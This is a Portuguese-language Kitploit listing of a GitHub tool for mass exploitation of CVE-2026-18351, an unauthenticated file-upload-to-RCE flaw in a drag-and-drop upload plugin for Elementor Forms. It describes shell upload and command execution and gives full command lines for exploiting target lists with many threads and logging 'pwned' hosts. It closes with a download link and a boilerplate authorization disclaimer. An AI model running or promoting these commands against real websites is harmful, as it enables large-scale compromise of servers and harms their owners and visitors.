Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-18351 — Ferramenta de exploração em massa para CVE-2026-18351, um upload arbitrário de arquivos não autenticado para RCE no Elementor Forms <= 1.6.0, com sondagem passiva, upload de shell e execução de comandos. | Kitploit
Ferramentas/GitHubGitHub/johenlastgen-jlg/cve-2026-18351
Scanners de VulnerabilidadesExploraçãoScripting e AutomaçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHub
johenlastgen-jlg/cve-2026-18351

CVE-2026-18351

Ferramenta de exploração em massa para CVE-2026-18351, um upload arbitrário de arquivos não autenticado para RCE no Elementor Forms <= 1.6.0, com sondagem passiva, upload de shell e execução de comandos.

Ver Repositório
há 16h 29mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-18351

Ferramenta de exploração em massa para CVE-2026-18351 — Upload Arbitrário de Arquivo Não Autenticado → RCE em Drag and Drop File Upload for Elementor Forms <= 1.6.0.

créditos johenlastgen | telegram @johenlastgen | canal @jlgnetworkredirect


Funcionalidades

  • Sonda passiva de vulnerabilidade (sem upload)
  • Modo de exploração completo com upload de shell e confirmação de RCE
  • Suporte a alvo único e múltiplos alvos
  • Suporte a múltiplas threads
  • Execução de comandos configurável
  • Arquivos de saída de log completo, apenas vulneráveis e apenas comprometidos
  • Configuração de timeout de requisição

Requisitos

Sem dependências externas — utiliza apenas a biblioteca padrão do Python.

root@kitploit:~
python3 --version  # 3.6+

Uso

root@kitploit:~
# Alvo único — apenas verificação passiva (sem upload)
python3 mass.py --url http://target.com --check

# Alvo único — exploração com comando padrão (id)
python3 mass.py --url http://target.com --cmd id

# Alvo único — exploração com comando personalizado
python3 mass.py --url http://target.com --cmd whoami

# Múltiplos alvos — verificação passiva
python3 mass.py --list targets.txt --threads 50 --check

# Múltiplos alvos — exploração
python3 mass.py --list targets.txt --threads 50 --cmd id

# Múltiplos alvos — exploração com ajuste de timeout
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami

# Salvar log completo
python3 mass.py --list targets.txt --output results.txt

# Salvar apenas alvos vulneráveis
python3 mass.py --list targets.txt --output-vuln vuln.txt

# Salvar apenas alvos com RCE confirmado
python3 mass.py --list targets.txt --output-pwned pwned.txt

# Saída combinada
python3 mass.py \
  --list targets.txt \
  --threads 50 \
  --cmd id \
  --output results.txt \
  --output-vuln vuln.txt \
  --output-pwned pwned.txt

Opções

OpçãoDescrição
--urlURL de alvo único
--list FILEArquivo contendo URLs de alvos (uma por linha)
--checkApenas sonda passiva — sem upload de arquivo
--cmd CMDComando a executar no shell (padrão: id)
--threads NNúmero de threads concorrentes (padrão: 20)
--timeout NTimeout por requisição em segundos (padrão: 10)
--output FILESalvar log completo em arquivo
--output-vuln FILESalvar apenas URLs de alvos vulneráveis em arquivo
--output-pwned FILESalvar apenas alvos com RCE confirmado em arquivo

Estados de Saída

EstadoSignificado
PWNEDShell enviado e RCE confirmado
VULN-NO-EXECUpload aceito mas execução do shell falhou
PATCHEDUpload rejeitado ou nonce não encontrado
ERRORFalha de rede ou de parsing

Formato do targets.txt

Uma URL por linha. Linhas iniciadas com # são ignoradas.

root@kitploit:~
http://target1.com
https://target2.com
# this line is ignored
http://target3.com

Aviso Legal

Este projeto é fornecido exclusivamente para avaliações de segurança autorizadas, pesquisa de segurança defensiva e validação de vulnerabilidades.

Ao utilizar este software, você confirma que possui autorização explícita para avaliar os sistemas alvo. O acesso não autorizado a sistemas computacionais é proibido e pode violar leis aplicáveis.

O autor e os contribuidores não incentivam nem toleram o uso não autorizado deste projeto e não assumem qualquer responsabilidade por qualquer uso indevido, dano ou consequência legal resultante de sua utilização.


Autor

JohenLastGen — JLG NETWORK

Baixar ferramenta